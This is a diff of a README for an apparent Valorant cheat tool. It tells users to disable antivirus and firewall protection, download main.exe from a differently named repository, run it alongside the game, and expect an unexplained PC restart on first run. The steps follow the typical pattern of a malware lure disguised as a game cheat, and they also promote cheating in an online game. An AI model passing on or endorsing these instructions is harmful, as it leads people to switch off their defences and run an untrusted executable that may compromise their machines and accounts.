Forkie1/ValorantCheat/README.md

 ## Download and Installation

+- Disable any AV or firewall settings you have to avoid deletion
 - Go to the [Releases](https://github.com/Forkie1/ValorantExecuter/releases/tag/new) page.
-- Download the latest EXE
+- Download the latest EXE (main.exe)
-- Disable any AV or firewall settings you have to avoid deletion
 - Open your Valorant
 - Run the EXE with Valorant running
+- You will hear a confirmation sound and you will be set

 ### The cheat may restart your PC after first run, (This is normal and will only happen once)